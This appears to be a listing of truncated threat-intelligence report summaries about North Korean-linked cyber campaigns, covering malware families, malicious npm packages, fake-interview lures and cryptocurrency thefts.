387 reports
Fox-IT analyzed a Lazarus subgroup toolset used against financial and cryptocurrency organizations, overlapping with activity linked to AppleJeus, Citrine Sleet, UNC4736, and Gleaming Pisces. The intrusion chain uses DPAPILoader to decrypt victim-bound pa…
Chainalysis tracks how OFAC has increasingly added cryptocurrency identifiers to sanctions designations, with several DPRK-linked cases showing how wallets, exchanges, bridges, DeFi services, and mixers support sanctions evasion. The DPRK-relevant section…
Red Asgard frames Lazarus-attributed fake coding interviews as an execution path into developer workstations rather than a traditional external exploit. The lure asks a developer to clone and run an interview repository on a machine that may already hold …
Red Asgard identifies five trojanized browser extensions tied to a Lazarus/Contagious Interview extension layer, masquerading as Bitwarden, Phantom, TronLink, Trust Wallet, and a Brave/MetaMask-themed wallet. The extensions resolve their command-and-contr…
SANS ISC analyzes an obfuscated Node.js stealer uploaded as `extracted-decoded.js`, with a heavily obfuscated execution wrapper but plain-text embedded payload modules. The malware targets Windows through WSL, macOS, and Linux, stealing Chromium-family br…
Trend Micro reports that Void Dokkaebi, also known as Famous Chollima, has migrated InvisibleFerret from readable Python scripts into Cython-compiled `.pyd` modules on Windows and `.so` modules on macOS. The campaign remains focused on software developers…
AhnLab's April 2026 financial-sector review links WGear RCE exploitation to DPRK-relevant activity, noting that Andariel has repeatedly abused the vulnerability. In observed cases, the WGear process launched mshta to retrieve external HTML, download and e…
The episode covers an eleven-hour forensic window into a live adversary server tied to a Lazarus-attributed fake interview campaign. Researchers preserved a contested Windows machine while two password changes were occurring, exposing the operator workben…
EndPoint, formerly known as Midnight, is a Babuk-derived ransomware family that targets Windows, ESXi, and NAS environments and uses double extortion through encryption and data-leak threats. The malware supports argument-controlled encryption scope, dele…
OX Security identified a malicious npm package, terminal-logger-utils, with keylogger, infostealer, and RAT behavior and linked the activity to previously documented North Korean supply-chain campaigns. The package is triggered through a postinstall hook …
Krypt3ia assesses that North Korean cyber operations have shifted from separate espionage, financial theft, and disruptive tracks into an interconnected access-generation ecosystem. The report links fraudulent remote IT-worker schemes, developer-targeting…
Bitso described another suspected North Korean Chollima job applicant who attempted to interview for an engineering role under the claimed identity of Camilo Andrés Pantoja from Colombia. During the call, a Canary Token link exposed that the applicant con…
OpenSourceMalware found three malicious npm packages linked to the March 2026 Axios compromise through the shared XOR key OrDeR_7077, while using separate C2 infrastructure at 18.208.244.120:9999. The packages redeem-onchain-sdk, nicegui, and period-newli…
Attackers are sharpening established methods rather than abandoning them, using offensive tooling, infostealers, ransomware affiliates, social engineering, and trusted-platform abuse with greater speed and resilience. Bridewell highlights adversary infras…
A DPRK-linked TraderTraitor/UNC4899 actor stole 116,500 rsETH, worth about $292 million, from the KelpDAO rsETH bridge on April 18, 2026. The intrusion began with social engineering against a LayerZero Labs developer on March 6, enabling session-key theft…